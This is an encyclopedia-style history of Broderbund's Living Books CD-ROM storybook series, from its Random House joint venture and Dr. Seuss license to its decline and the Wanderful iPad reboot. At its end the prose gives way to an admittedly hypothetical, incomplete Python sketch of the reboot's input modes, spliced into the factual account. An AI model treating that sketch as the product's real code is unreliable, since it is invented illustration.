At the American Booksellers Association convention, Alberto Vitale, head of Random House Publishing (then owned by Advance Publications) and the Dr. Seuss book rights holder, saw a demo of Just Grandma and Me and approached the team. Vitale was impressed with the series and decided to buy half of Living Books. In her role as Technical Creative Director, Bonifield created the Living Books production methodology that facilitated the $15 million deal. On September 9, 1993, the Living Books Partnership Agreement was signed between Broderbund, Random House, Random House New Media (a new division set up by its president Randi Benton) and Broderbund's Living Books, forming Living Books as a joint venture between Broderbund and Random House to publish story-based multimedia software for children, 50% owned by each. As Broderbund's shares had recently decreased, at the time analysts were concerned that this was due to Broderbund's older titles and that the company had concentrated its growth in the new venture. Broderbund spun off Living Books into its own independent company, which started operations in January 1994 under Broderbund/Random House. While Broderbund offered the already-published Living Books product line and the resources to produce more interactive storybooks, Random House offered additional funding and access to its library of children's book authors. This gave Broderbund access to more book titles.
The new Living Books took over the research and development, manufacturing and marketing associated with the creation of its products, which were distributed through Broderbund's and Random House's respective channels under an affiliated label arrangement for Windows and Mac. A relocation of the Living Books offices to San Francisco was announced on July 31, 1995 and was completed in October of that year. Living Books' staff of 45 worked out of the new site to develop, produce and market the software, while assembly and shipment of final products would continue to be performed at Broderbund's facility in Petaluma, California. Unusually for a kids' software company, this meant Living Books was created with a "strong, in-house foundation of experience" in all stages of the business, including product development, production, marketing and publicity, all coordinated at the Living Books headquarters in San Francisco. Some of the titles were promoted via the distributor Softline, and Broderbund had accounts with retail stores like Musicland's Media Play and Trans World Music. Titles like Dr. Seuss's ABC were available from mail order suppliers. Living Books became "one of the first alliances between dominant companies in their respective fields". The deal led to Broderbund's stock gaining $3.75 to $41, while the company's equity in income was boosted by approximately $3.9 million from the Living Books joint venture. Living Books heads Bonifield and Siegel left in 1994 to form digital video company Genuus, later commenting "at one time Broderbund was exciting, but it became big and lethargic". Jeff Schon, former Pee-wee's Playhouse producer, was brought in as CEO of Living Books and would lead the company for four years until 1997. From November 1995 to December 1996, Bobby Yarlagadda served at Living Books as VP and its first CFO, leading the IT and Business Development groups; during this time he doubled the capacity for content production by setting up outsourcing contracts with suitable vendors. By 1997, the company was accepting product submissions from professional developers and third-party outsourced production work via its website. After Yarlagadda's departure, he joined forces with Schlichting to set up the software company The Narrative Communications Corporation while Schlichting was still at Living Books.

Dr. Seuss license
By 1994 there was a "scramble among multimedia developers to gobble up rights to intellectual property" for "translation to the new medium", and Dr. Seuss became "among the most hotly contested". Author Ted Geisel had died in 1991 and the multimedia rights to his works had become available. When Broderbund and Random House formed Living Books, their discussions centered around which books would be the best to adapt; once they discovered the Dr. Seuss rights were available they "went after them aggressively." Talent agency ICM Partners had arranged a parade of software firms, including Microsoft, Paramount Interactive and Activision, to visit Dr. Seuss' widow Audrey Geisel, chief executive of Dr. Seuss Enterprises and rights holder, who was known as a "fierce guardian of its artistic integrity". But Vitale encouraged Living Books to present to Geisel in a bid to acquire the digital rights; Living Books created a demo which also incorporated Broderbund's paint product Kid Pix, using stickers from Dr. Seuss' book I Can Draw It Myself.
After showing the demo in front of Geisel, Baker, Carlston, and Vitale in silence, Schlichting decided to tell the story of being inspired as a child to enter into the world of Dr. Seuss, leading to Geisel telling her intellectual property lawyers "I've changed my mind, I'm going to work with him". While Geisel was not impressed with this first presentation and felt the demo was poor, she chose Living Books due to her "desire to honor her husband's 50-year association with Random House", giving them a second chance. Random House had been the sole publisher of the Dr. Seuss books since 1937. Brokered by Geisel's agency International Creative Management, Random House ended up securing the digital rights to Dr. Seuss in a deal said by a close source to be "well into the seven figures", and subsequently provided Living Books the "coveted" electronic rights to the Dr. Seuss books along with those of other best-selling Random House children's authors. Signed and publicly announced in April 1994, the deal made Living Books the first company to adapt Dr. Seuss to a digital format. Variety noted that the deal underscored how Living Books had "positioned itself as a front-runner in the children's multi-media market", managing to secure a deal with Dr. Seuss Enterprises despite "competing companies offer[ing] richer financial packages". Their first Dr. Seuss title, Dr. Seuss's ABC, was previewed at the 1995 Electronic Entertainment Expo ahead of a release in September that year, while The Cat in the Hat was in their future slate. Living Books aimed to publish up to 10 electronic titles the following year, including Dr. Seuss titles, which would be released at the $40–$60 price point. Geisel was given approval rights on every stage of the Dr. Seuss Living Books products' development. Advertising Age saw Living Books' pending release of their first Dr. Seuss CD-ROMs as one of the industry's "most-watched developments". Geisel was present at the 1996 E3 Living Books booth to inaugurate the interactive version of Green Eggs and Ham, which was due for release that autumn.

Growth (1994–1996)
Commercial success
The games sold strongly. However, the low price point and large development costs, coupled with the newness of CD-ROMs, made it difficult for Living Books to turn a profit. Additionally, at the time the school market was still fledgling, and schools rarely had the funding to afford computers for their students; as a result most of Living Books' sales were into the home market. By 1995, Living Books was still targeting its products at home buyers. In the first half of 1993, Broderbund sales jumped 69 percent, to $73 million, according to the Software Publishers Association, aided by Carmen Sandiego, Kid Pix, and the debut of Living Books. Just Grandma and Me became one of the best-selling CDs for children in 1993. By August 1994, the series had sold tens of thousands of copies, and that year pre-tax profits of Living Books exceeded $6,000,000. By late 1994, the simultaneous success of the best seller Myst (1993) and the early-learning Living Books had given the relatively small Broderbund dominance in two market segments. Broderbund's success allowed it to continue marketing to a mass consumer base, publishing software for entertainment, education, and home management; the company also offered a creatively free environment for its programmers, who were able to push the boundaries of computer programming through titles like the CD-ROM series Living Books.
Living Books would see an ongoing release of new titles and would continue to have respectable sales. The first quarter of 1995 saw Broderbund mark an initial contribution of $1.7 million in nonoperating income from its 50 percent interest in Living Books. In January 1995, Rambabu (Bobby) Yarlagadda was appointed to the position of vice president and chief financial officer. Since its debut four years prior, Mercer Mayer's Just Grandma and Me had sold over 400,000 copies. During the fiscal 1995 year, Living Books grew approximately 50%, primarily due to expansion of product lines, and contributed 13% to Broderbund's fiscal 1995 revenue, more than Carmen Sandiego. Living Books became profitable and continued to expand. December 1996 saw Living Books' Green Eggs and Ham as the 6th best-selling title in the Home Education (MS-DOS/Windows) category, while Dr. Seuss's ABC/Green Eggs and Ham was the 8th best-selling in the Home Education (Macintosh) category. From October 1996 to January 30, 1997, a promotional campaign was run in the French magazine SVM where readers could collect a Broderbund-Living Books loyalty card by finding all the products from the Broderbund and Living Books ranges and win numerous prizes, including a demo CD-ROM of Myst or two educational titles. Living Books was No. 2 with 12% of the market share for educational CD-ROMs in December 1999, behind Disney's 13.2%. Each game cost "hundreds of thousands of dollars" to produce; budgets ranged from $500,000 to $1 million. Producer Philo Northrup noted that creating Green Eggs and Ham was "very expensive". The credits to Dr. Seuss's ABC list over 100 names, including additional departments like musicians and choreographers. In 1997, Living Books ran a Green Eggs and Hamulator Scavenger Hunt on their website, with 36 parts scattered across the Internet; the winners were awarded prizes. The company would grow to 100 people and produce a total of 20 titles. Trouble was brewing, however; from 1994 to 1995, Living Books' competition limited its retail display space and drove down "family entertainment" product prices by more than 11 percent.

Finding source material
At the time, there was a "trend toward familiar characters". Jason Lippe, general manager at multimedia educational store Learningsmith, opined that newer educational programs were more successful in capturing children's interest because they were based upon characters the children already knew. Publishers often sought stories from popular culture like film and TV. In contrast, Living Books primarily sourced material from classic literature, including traditional tales like The Tortoise and the Hare, and enduring children's picture books from well-known authors, such as Dr. Seuss's Green Eggs and Ham. The Cat in the Hat was released on the 40th anniversary of the original book's publication. On May 24, 1994, Living Books acquired worldwide media rights to the Berenstain Bears' First Time Books series from authors Stan and Jan Berenstain; the book rights were owned by Random House. Living Books sought to secure the rights to stories that had already seen "success and acceptance" among teachers, parents, and publishers. Stories like those of Mercer Mayer had been "well received" by children, leading to Living Books' interest in adapting them. Living Books material touched upon ideas familiar to children, such as in The Berenstain Bears Get in a Fight, where two kids squabble and their parents try to deal with the problem.
Animation World Network named Living Books as a series from the 1996–97 season that "hope[d] to cash in on the success of existing animated properties", alongside Fox Interactive's Anastasia: Adventures with Pooka and Bartok and THQ's PlayStation action game, Ghost in the Shell. Originally, Mark Schlichting was going to make a Noddy book instead, but he loved the Arthur story so much that he stuck with it. While most titles were based on popular franchises, a few were brand new. The first original Living Books game that was not based on any existing picture book featured a modernized edition of Aesop's Tortoise and the Hare fable, focusing on the "slow and steady wins the race" moral; this story was retold by Schlichting and illustrated by Michael Dashow and Barbara Lawrence-Webster. Ruff's Bone was the second original Living Books story, born from a collaboration between Broderbund and (Colossal) Pictures' New Media Division. It was co-produced by (Colossal) Pictures and written by (Colossal) Pictures head Eli Noyes; featuring a dog in search of his bone, the story was creative-directed by Noyes. It was the first CD-ROM produced for Living Books by an external company. Noyes had been inspired by Just Grandma and Me upon its 1992 release, having realised that CD-ROM was the "perfect modern-day medium for all my previous experience creating children's projects". In contrast to paper publishing projects, the team learnt that interactive storytelling relies more on collaboration, as in film production, and appreciated the democratic decision-making culture. In September 1994, Living Books previewed Ruff's Bone at COMDEX. (Colossal) Pictures would lay off most of its staff in 1996; the WildBrain Entertainment animation house, which largely consisted of ex-employees from (Colossal) Pictures, would be contracted by Living Books to work on Green Eggs and Ham. Meanwhile, the third original story, Harry and the Haunted House, was written by Schlichting himself. Convinced that his concept for electronic books would work, he had written the story in 1988 specifically for the computer but never published it in paper form until the Living Books version was released. Schlichting said, "when I first wrote Harry and the Haunted House, I wanted to allow kids to go inside the pages of the storybook and play along with Harry and his friends as they overcome their imaginations while exploring the old house". In 1994, The Peep Show creator Kaj Pindal met with Schon about adapting the characters and films of the Peep franchise (which began with the 1962 short film The Peep Show) to the CD-ROM format, eventually securing a publisher's contract with advance payment against royalties. Pindal began to work with Derek Lamb to create a prototype in the summer of 1996, though the project would eventually be cancelled.

Adaptation
The development team were committed to, as often as possible, working closely with each author to ensure a faithful rendering of the original story and its intent. These interactive storybooks were complete, animated renditions as opposed to the "highly edited and abridged versions" from other companies. Computer Museum Guide comments, "it's no coincidence that the books and the corresponding software are both popular". The use of a popular character like Arthur gave Arthur's Computer Adventure "significant shelf and package appeal to kids". The Living Books page illustrations generally replicated those from the book.
However, Stellaluna, a story by Janell Cannon about a young fruit bat who becomes separated from her mother, varied from the source material through its language, visual perspectives, images, and animations, which affected the orientation, social distance, and tone of the experience. Reframing Research and Literacy Pedagogy Relating to CD Narratives writes that when a character queries Stellaluna's unusual behaviours, they gaze directly at the reader and demand an interpersonal engagement of the reader, as opposed to the book version, where the character's gaze is directed at Stellaluna as an offer and the reader looks on with interpersonal detachment. Living Books' narrated, highlighted, and clickable text is identical to that of the book, though the characters sometimes have "conversational asides". Stellaluna contains 21 additional lines of text; however, Cannon's version has just fifteen pieces of spoken or thought dialogue for Stellaluna. Schlichting said "our relationship with the authors of the original books was that we would be taking their babies, their stories, their characters, and bring them over into animated media for the first time". Arthur had never had an animated voice before. (Living Books' 1992 release Arthur's Teacher Trouble predated the popular TV series by four years.) Just Grandma and Me was the first digital outing for Mercer Mayer. Schlichting asserts that he was the first designer to bring the works of Dr. Seuss, Marc Brown, Stan and Jan Berenstain, Mercer Mayer, and Jack Prelutsky to digital life. That said, Living Books' two titles The Berenstain Bears Get in a Fight (1995) and The Berenstain Bears in the Dark (1996) were preceded by several Berenstain Bears titles released by Compton's New Media. Schlichting observed that Living Books often had a "profound effect" on their original authors; upon seeing Arthur's Teacher Trouble, Marc Brown said it "change[d] the way he thinks about books", and from then on he wrote books with animation and interaction in mind. Kevin Henkes, creator of Sheila Rae, the Brave, said, "for someone who doesn't own a computer, having one of my stories on CD-ROM is amazing...I realize that developing children's software is very different from telling a story in a traditional book format, and I appreciate Living Books' commitment to quality and deep concern for its audience". Stan Berenstain, co-creator of The Berenstain Bears, said of their digital adaptation, "the team from Living Books understands how important humor and great visuals are in communicating information to children". After spending months on a prototype for New Kid on the Block, Schlichting presented the interactive version to the book's author, Jack Prelutsky; afterwards Prelutsky turned to Schlichting and exclaimed, "Will you marry me?". Geisel expressed initial concerns about the quality and wanted the Dr. Seuss adaptations to be "absolutely line-proof to the books", though she relented that her husband would be "enchanted" by the "interactive personal creative possibilities" that the new form of communication offered, and was supportive of the "hidden learning process". Of Green Eggs and Ham, she commented, "I am delighted, as I know Ted would be, with the conversion of his most popular book onto CD-ROM by Living Books". Just Grandma and Me was Mayer's first attempt at marrying the printed book and the computer into an educational and entertaining experience for children; of the program's success he said, "It was kind of a surprise".
Disability
In response to a call by the Alliance for Technology Access (ATA) for software companies to design products that were accessible to users with disabilities, Living Books stated its commitment to addressing accessibility issues by designing interactive, animated storybooks for all children, regardless of their ability levels, in order to "broaden its scope of access". Living Books collaborated with the Alliance in the design process, inviting it to test Broderbund's software with various assistive devices, including screen enlargement programs, such as inLarge, and alternative keyboard access programs, such as IntelliKeys. Closed-captioned CD-ROMs were virtually non-existent as of 1996 and there was no organized effort to encourage multimedia companies to provide subtitles for plot-intensive products; Living Books mostly circumvented this by displaying the story text on screen. 23 products including Living Books titles went through the Alliance testing process, and the Alliance created a list of Broderbund products that could be accessed with each device. This resulted in the incorporation of the ability to enlarge the standard size of print and graphics, and the option of using voice commands instead of keystrokes or a mouse, helping users access the 'read aloud' mode and the settings options. In 1995 the ATA released a short promotional video, Quality of Life: Alliance for Technology Access; production costs were underwritten by IBM's Special Needs Systems with help from past ATA supporters including Broderbund and Living Books. Ray worked with companies that adapted the products for use on special keyboards designed for children who had problems using a standard mouse to interact with the stories (cerebral palsy, muscular dystrophy, autism, learning delays). Living Books became "especially popular with autistic children". In January 1997, Living Books donated four pieces of software to The Children's Trust after attending a Children's Head Injury Trust awareness week and learning that the Trust had been donated a Compaq Presario computer; children with limited abilities played the programs via a tracking system produced by Scope's Microtechnology Services. This move was praised by the facility's cognitive remediation and recreational/rehabilitation departments.
Little Ark Interactive
In 1996, Broderbund created the division Little Ark Interactive as a Living Books imprint. The project was at the direction of Doug Carlston, co-founder and CEO of Broderbund, whose father had been a priest. The joint venture's new division was created to develop and sell children's titles based on the Old Testament, a niche market with competitors like Compton's New Media product Children's Bible Stories. Little Ark Interactive then sought out Red Rubber Ball, the multimedia division of Atlanta-based Christian television and interactive music video producer The Nicholas Frank Company, to develop the titles. In December 1996, Red Rubber Ball signed a licensing agreement with Living Books to develop CD-ROM titles under Red Rubber Ball's children's label Little Works to be published under Living Books' new Little Ark Interactive imprint; Red Rubber Ball handled writing, art, and advisory board duties while Living Books handled special effects, programming, and marketing.
Little Works' The Story of Creation and Little Works' Daniel in the Lion's Den, which adapted biblical-themed Old Testament stories through "art, music and characterizations", were developed under the direction of members of the original Living Books team. Cel animation was completed by J. Dyer Animation and Design EFX respectively. The scripts for the two stories were written by children's author Ruth Tiller while musician Mark Aramian created compositions for the titles. The two stories were released on January 28, 1997 as the first of a planned series of five or six religious titles to be completed throughout 1997. To ensure they reached the broadest possible audience, the CD-ROM titles were screened by a multi-denominational panel of religious experts that included a rabbi, two pastors and a theologian. Little Ark Interactive anticipated a huge market as the Bible was still a best-seller in the United States centuries after its first publication, and as people of Jewish, Christian and Islamic faith all looked to the Old Testament. Little Ark also aimed to tap into nonreligious and non-denominational families who wanted to teach their children about the Bible.
Trouble (1996–1997)
Market saturation
Living Books began to face growing competition from Disney Interactive (Disney's Animated Storybook) and Microsoft in the animated storybook genre. These companies flooded retail outlets with low-cost titles, reducing the market value from $60–70 to $30–40 off an $8 cost, making it difficult to compete at the same price point. Living Books' sales dropped while costs increased. Little Ark Interactive products entered the market at around $20. Living Books became pressured to produce games at a faster pace while retaining their superior level of quality. This continued into fiscal year 1997, when the market for CD-ROM children's interactive storybooks continued to be "intensely competitive", which resulted in average selling prices being pushed down; Living Books had competitors with access to proprietary intellectual property content, and the financial resources to leverage branded media through film and TV. Media companies began leaving the multimedia business or downsized; GTE Entertainment announced it would shut down in March 1997, while Disney Interactive, Philips Interactive, and Viacom NewMedia cut jobs and even entire divisions to save money. Publishing houses that had previously entered the multimedia business were forced to downsize their operations or exit the industry entirely. The state of the CD-ROM industry was often put down to "inflated prices, mediocre titles, incompatibilities and bugs". However, Salon wrote that the financial struggle of even a reputable company like Living Books demonstrated that the "current woes of the multimedia b[usiness]" couldn't be "blamed simply on bad products". Schon suggested that despite the children's software segment of the interactive multimedia industry growing by 18 percent in 1996, with total revenues near $500 million, there were too many publishers to share the target market, and too many products fighting for the "very limited shelf space". In the first two quarters of 1996, Broderbund's product line including the Living Books series amounted to 9 percent of the market share. That September, The Daily News asserted that the Living Books series was "currently not making money".
Even more concerning for the company, "the rapid growth of the Internet presented a profound disruption of Living Books' basic production model", as there was a growing belief that content on the internet should be free. The emergence of the World Wide Web had diverted investment capital and development talent from the CD-ROM industry and broken its hold on consumers. In 1996, Living Books explored partnerships with Internet companies such as Netscape, and proposed a Netscape/Living Books collaboration called Netpal. Schon expressed hesitance about exploring web-based titles, as the narrow available bandwidth would have given children a "slow, dull experience"; he was also uncertain what the business model would be in this new market. By April 1997 a brand new release from Living Books could be purchased for as little as $19.95 with coupons. Publishers struggled to find the right price point that would entice parents while allowing them to break even. The Learning Company (formerly SoftKey) had a significant impact on the market. Throughout the 1990s it had a strategy of releasing shovelware discs of freeware or shareware at very low prices, purchasing edutainment companies through hostile takeovers and reducing them to skeleton staff, while retaining only a small development team to keep cranking out new products; by 1998 Broderbund was one of the few independent companies still standing. The Learning Company CEO Kevin O'Leary pioneered a budget line of CD-ROM products in 1995, with the company's "Platinum" line titles carrying retail list prices of $12.99 instead of the mid-$30 range most of the premiere products carried; FundingUniverse explained that this was achieved "with the elimination of elaborate packaging and hard-copy documentation, and the move to jewel-case formats with CD-sized booklets". In a direct action against Broderbund, The Learning Company bought the company that made PrintMaster, a rival to Broderbund's best-seller The Print Shop, and sold it for $29.95 with a $30 refund, which Broderbund couldn't compete with; this had a significant effect on Broderbund's stock price. Broderbund adopted a defensive strategy of preventing the remaining edutainment companies from being acquired by The Learning Company, a factor that would lead it to re-acquire Living Books.
Return to Broderbund
This climate affected the profit projections of Living Books. In 1996–97, Broderbund enlisted Jeff Charvat to turn the troubled series around; Charvat "charg[ed] in with answers, rather than questions", a strategy he later admitted "[wa]sn't the way to go". With mounting losses, Random House started trying to sell its shares and began negotiating with Broderbund. On January 17, 1997 it was reported that Broderbund and Random House had "reached preliminary agreement on key terms" to transition Random House's stake in the 50–50 joint venture to Broderbund in a buyback, though it would need to be approved by each company's board of directors; Random House would continue to be a content partner for future Living Books products. Under the new arrangement, Random House would continue to sell Living Books via its bookstore channels and help Broderbund acquire content licences for future titles, while royalties would be determined on a case-by-case basis.
At the time, Joe Durrett, Chief Executive Officer of Broderbund, noted, "although Living Books remains a small portion of Broderbund's revenue, it shares our focus on children's education and will continue to play a central role in educational software development." Randi Benton, president of Random House New Media, felt that integrating Living Books into Broderbund would allow it to better take advantage of the company's sales and marketing. Random House was to receive an undisclosed amount of cash and Broderbund stock. The agreement was signed on January 20, 1997, and Broderbund hinted at a management reshuffle. At this point it was unclear whether Living Books would be folded into Broderbund or remain a separate entity. It was not uncommon at the time for book publishers to revise their multimedia strategies. Random House would also sell its minority stakes in Humongous Entertainment and Knowledge Adventure, while HarperCollins sold off both its adult and children's operations; meanwhile, Simon & Schuster "readjusted" by cutting staff and cancelling titles. Publishers Weekly attributed their market failure to bookstores, their traditional distribution channels, being hesitant to embrace new media, leaving the book publishers to fight for shelf space in alternative outlets against established new media players. Random House ultimately sold its shares in Living Books back to Broderbund for $9.3 million (through a combination of cash and restricted stock with an aggregate purchase price of approximately $18,370,000). The Living Books excess purchase price was allocated to in-process technology and charged to Broderbund's operations account at the time of acquisition. As a result, Living Books became wholly owned by Broderbund, which subsequently folded the division into its own operations. By April 1997, Living Books had reduced the number of titles it released per year, adopted a culture of parsimony, and relied on its "high-quality back-list of classics" to "generate steady income". Schon anticipated a "shakeout". In October 1997, Living Books halted half its projects and underwent a restructuring in which more than half its workforce, including Schon, was laid off. The layoffs came after consecutive quarterly losses at Living Books. Broderbund's education line of products, which included Living Books, decreased approximately 8% in fiscal 1997 as compared to a 13% increase in fiscal 1996. Broderbund, which had purchased both Parsons Technology and Living Books over fiscal year 1997, saw its shares fall by 9.8 percent after reporting a second-quarter multimillion-dollar loss. Channelweb commented that Broderbund had "burnt its fingers" with Living Books, which had "turned in a lacklustre performance". Broderbund explained Living Books' decline in unit sales and net revenues over fiscal 1996 and fiscal 1997 as "an increase in operating expenses reflecting higher marketing and development costs" and "pricing pressure".
Decline (1997–2000)
Later activities
On August 27, 1996, the company released an interactive website at www.livingbooks.com called Living Books' Corner of the Universe; Tortoise from "The Tortoise and the Hare" guided visitors through three planets: the Kids' Planet, the Grown-Ups' Planet and the Corporate Planet. Narrative Communications' Enliven streaming technology was used to allow demos to be played over the internet. In 1997, Broderbund bundled Living Books titles in groups of four and re-released them as Living Books Libraries at a competitive price point of $30.
They contained "a special bilingual component that includes Spanish versions of selected student reproducible pages and a discussion of the special needs of second language learners", as well as a Living Books Alive video demonstrating the practicable application within the classroom. Broderbund also released two compilations of the stories under the line "Three for Me Library". The first volume contained Sheila Rae, the Brave, Just Grandma and Me, and Little Monster at School, while the second volume contained The Berenstain Bears Get in a Fight, Tortoise and the Hare, and Harry and the Haunted House. In 1997, Broderbund also re-issued Just Grandma and Me and Arthur's Birthday as Version 2.0 with increased resolution and additional minigames. Just Grandma and Me 2.0 also featured a Castilian Spanish dub as opposed to the Latin Spanish dub of the 1.0 release. Arthur's Computer Adventure was released on August 3, 1998 as the first in a "new evolution" of Living Books which "fully incorporate[d] storybook and activity center elements". By 1998, Broderbund had sold 10 million copies of this series worldwide and had achieved over 60 awards. That year, Living Books developed and published its last titles, which were based on the Arthur children's book series. In February 1998, Broderbund offered ICTV, provider of high-speed internet services and interactive multimedia content over cable television networks, selections from a suite of educational and entertainment interactive CD-ROM titles including Living Books. After two years of negotiation, in August 1998 Brazilian publisher Editora Delta secured a contract to translate the series of 18 books into Brazilian-Portuguese (as "Livros Vivos"); the company had previously been known as producer of the encyclopaedia "Koogan Houaiss" and the Mundo da Criança collection. Founded in 1930, Delta entered the multimedia industry in the 1990s with the importation of foreign CD-ROMS; product localisation was necessary for these titles to be successful, and as such Delta employed a translation process that adapted the content, localising references, lip syncing the mouths, and altering the story text and animation. This phase of the company was launched with the volumes of the "Livros Vivos" collection for the child consumer: "Só Vovó e Eu", "Ursinhos Brigões", "Aniversário do Artur" and "Stellaluna", worked on from 1994 to 1996. Delta secured Sítio do Pica-Pau Amarelo actress Zilka Sallaberry to narrate the stories. The CD for O Aniversário de Arthur (Arthur's Birthday) was released with the Spanish and English language options. In March 1999, Delta would announce the release of Stellaluna. By 2002, The Tortoise and the Hare was selling for $9.98 at Children's Software Online. The Learning Company et al. sale On August 31, 1998, Broderbund was bought in a hostile takeover by The Learning Company (formerly SoftKey), in a stock deal of $416 million, following many other child-focused companies that were absorbed throughout the decade. The company had been formerly known as SoftKey until it acquired The Learning Company in 1995 and took its name. Broderbund became the 14th Learning Co. acquisition since 1994, and secured the company 40% of the educational gaming market. The Learning Company (formerly SoftKey) was known for aggressively driving down the development costs of products and laying off employees of the companies it acquired. Broderbund's 1700 employees were reduced a year later to around 30. 
While the Broderbund brand lived on, the company was disbanded and the talent found new opportunities. Meanwhile, "the rights to Living Books [and other Broderbund brands] began to bounce from corporate owner to corporate owner". The Learning Company re-released some Living Books titles. In 1998, D.W. the Picky Eater was upgraded as Arthur's Adventures With D.W. with a new menu system and additional games. Dr Seuss' ABC appeared in the collection Adventure Workshop: Preschool-1st Grade, and Tots. In 1998–99, Living Books launched the series in German. In 1999, The Learning Company released a reworked version of Arthur's Reading Race (1997) as Arthur's Reading Games under its Creative Wonders label, which brought the reading games to the forefront and moved the interactive story to a bonus feature. On May 13, 1999, The Learning Company was itself bought for $3.8 billion by Mattel, a company with limited experience in developing software titles. The acquisition was part of CEO Jill Barad's strategy to expand Mattel into electronic toys and video games. The Learning Company and the Broderbund brand names were brought under the Mattel Interactive umbrella. In its 1999 annual report, Mattel noted an "incomplete technology writeoff of $20.3 million related to products" being developed by Creative Wonders, Parsons Technology, and Living Books. In response to public complaints about privacy, Mattel Interactive announced that, starting June 2000, it would provide a tool to remove Mattel software called Broadcast, which had been surreptitiously placed inside Living Books and other programs to transmit information to and receive information from Mattel. Broadcast had been named after Broderbund, which had designed the original software as a marketing technique. However, the software was discontinued in April 2000, when the federal Children's Online Privacy Protection Act went into effect. That same month, Mattel Interactive was put up for sale. Mattel ended up selling The Learning Company to acquisition and management company The Gores Group for a fraction of the price it had originally paid. Mattel's acquisition of The Learning Company has been referred to as "one of the worst acquisitions of all time" by several prominent business journals. After taking over The Learning Company, Gores divided it into three groups, one of which focused on educational software and included the Living Books brand name; Riverdeep purchased this group in September 2001. Through Riverdeep mergers and acquisitions, the rights "eventually landed with publisher Houghton Mifflin Harcourt". According to Schlichting, Broderbund's turbulent corporate history meant that "many great CD-ROM titles for kids were forgotten while technology and operating systems moved forward." Schlichting asserts that, "for years, former team members and fans wished there was a way" to resurrect the series and that "several of us looked into it". While the series had experienced a "decade of great success", Houghton Mifflin Harcourt would not release new Living Books stories, and the series "languished without updates to newer operating systems for PC and Macs".
The series, however, was still well remembered; for instance, in 2007 The Open University of Israel published a journal article entitled Living Books: The Incidental Bonus of Playing with Multimedia, finding that "young children who did not know how to speak or read the English language became proficient in pronunciation and gained a high level of understanding by playing with Living Books".
Wanderful reboot (2010–2012)
Reboot conception
After the CD-ROM market's decline in 1997, Schlichting left to oversee creative development for an early online children's network called JuniorNet. In 2000, he founded NoodleWorks Interactive, a creative company specializing in children's interactive design, development, and social networking; his first iPad app for children, Noodle Words – Actions, was released in November 2011 and won numerous awards. In 2010 he presented at the Dust or Magic AppCamp as part of the "Panel of Legends"; he would continue to present at these conferences over several years. Meanwhile, Mantle left to work for Gracenote, a company which provided music information services to Apple. By 2010, Mantle had gathered a number of ex-Broderbund staff around him, and upon the announcement of the iPad, he felt it was the perfect platform to bring Living Books back. The animation, graphics, sound, and music would be unchanged; only the product platform would be different. Mantle identified that there were no products then on the market designed for children with autism, which had been a key demographic for Living Books. He enlisted Axworthy as Senior Systems Architect to create a prototype, using the series' existing assets, which could run on the new technology. Meanwhile, he contacted Baker to help determine who owned the Living Books CD-ROM asset rights and how best to license them. The pair worked out that the rights were owned by Houghton Mifflin Harcourt. By early 2011 a prototype was running. Mantle informed Schlichting that he was "getting the band back together", and Schlichting offered a list of "requirements and suggestions for enhancing the products" after reviewing the prototype. Schlichting was ultimately brought onto the project as Chief Creative Officer, as was Siegel, who resumed his role. Ray was brought back to update the materials for classroom teachers that she had initially developed for Living Books. Upon being asked to return, graphic technician Rob Bell was "thankful" that Mantle had the "resources and means and motivation" to do this project, which he saw as "bringing these products back to life". Mantle reached out to Houghton Mifflin Harcourt and succeeded in acquiring the Living Books CD-ROM rights and assets from John Bartlett, VP of Licensing, Consumer Products and Solutions, who had previously worked at The Learning Company and knew the series. However, as Houghton Mifflin Harcourt had let the digital rights – to the children's books on which Living Books were based – lapse, Mantle would have to secure the digital publishing rights directly from each of the authors. After receiving a mix of enthusiasm and skepticism from Broderbund co-founder and former CEO Doug Carlston, he enlisted a team of ex-Broderbund staff to build the technology and data assets. Meanwhile, Mantle sought to secure the rights from the authors, a process that would prove to be "almost more effort than producing the updated products". The digital licenses for Dr.
Seuss, some titles from The Berenstain Bears, and Little Critter had been obtained by Oceanhouse Media, which owned all of the interactive storybook game rights and had created its own iOS titles. By late 2011, Mantle had successfully secured the exclusive rights to all the Living Books storybook assets from HMH and most of the authors' publishing rights, and began active development. However, Houghton Mifflin Harcourt had allowed the Living Books content to be re-published so long as the Living Books name remained theirs. As Houghton Mifflin now owned the 'Living Books' brand, a new name was needed. The team decided to create a new moniker while including an attribution that the stories were "originally published as a Living Book by Broderbund Software" with the Living Books logo. After the team was presented with 30 potential names by Anthony Shore, Chief Operative of branding agency Operative Words, at a preliminary screening, Wanderful Interactive Storybooks was chosen. The new name is related to "wonderful" and "wandering", with the games "about being inside storybooks, exploring, and the magic of it all". Wanderful describes the books' "full[ness] of joy", the "invitation to explore", the "free-form play" from their "expansive and non-linear interactivity", and their "whimsy and curiosity, delight and enrichment". Wanderful's aim was to "reinvent and reintroduce the Living Books titles for young and emerging readers (and their families) everywhere".
Reboot development
The team had a significant hurdle to overcome in the next stage of development. While they had secured the Houghton Mifflin Harcourt rights to Living Books, the assets were not readily available. Broderbund's documentation, scripts, source code, and product assets (graphics, animations, sound, and music files) had been saved onto a set of CD-ROMs and placed in the company's product archives. However, Broderbund's turbulent company history at the turn of the millennium led to much of this archive being lost. Therefore, Wanderful hired original Broderbund programmers to re-create modules from scratch. Meanwhile, master archives of assets were created by acquiring customer copies of original Living Books products and extracting the files from the CD-ROMs. Axworthy identified not having the source code as the biggest challenge. Once the assets were retrieved, the titles still required significant modifications in order to optimise their "interaction and responsiveness"; this involved reprogramming how user interactions would be interpreted as actions. As a result, page introductions and animated sequences were made interruptible, which was key to making the product work on tablets. Wanderful added settings to allow the parent or teacher to "modify the interactivity to customize the mode of operation" to be appropriate for the child, choosing between an 'interruptible' mode (where clicking triggers an action – useful for word recognition) and a 'patience' mode (where players must wait for the current action to complete – useful for children with ADD) to suit different learning styles. Interruptible mode offered language exploration opportunities by allowing children to play with the beginning sounds of each word in a "rapid fire"; e.g. "Baa-baa-baa-baby". This new option benefited users through self-paced interaction and repetition, and the "ability to click a particular word 30 times in a row is like having an infinitely patient, ever-available teacher or parent".
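To make the distinction concrete, the following is a minimal, hypothetical Python sketch of how an input handler might dispatch a tap differently in the two modes described above; the Hotspot and StorybookPage names and the tap/finish_current methods are invented for illustration and are not Wanderful's actual engine code. In 'interruptible' mode a new tap cuts the running animation short, while in 'patience' mode input is ignored until the current action completes.

    from dataclasses import dataclass, field
    from typing import List, Optional

    @dataclass
    class Hotspot:
        name: str
        animation: str  # identifier of the animation/sound clip this hotspot triggers

    @dataclass
    class StorybookPage:
        mode: str = "interruptible"      # or "patience"
        playing: Optional[str] = None    # animation currently running, if any
        log: List[str] = field(default_factory=list)

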